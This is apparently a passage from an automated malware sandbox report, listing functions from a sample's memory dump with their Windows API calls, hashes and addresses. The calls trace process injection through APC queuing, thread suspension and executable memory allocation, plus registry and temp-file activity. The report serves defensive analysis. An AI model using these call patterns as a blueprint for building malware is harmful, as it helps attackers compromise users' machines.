    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
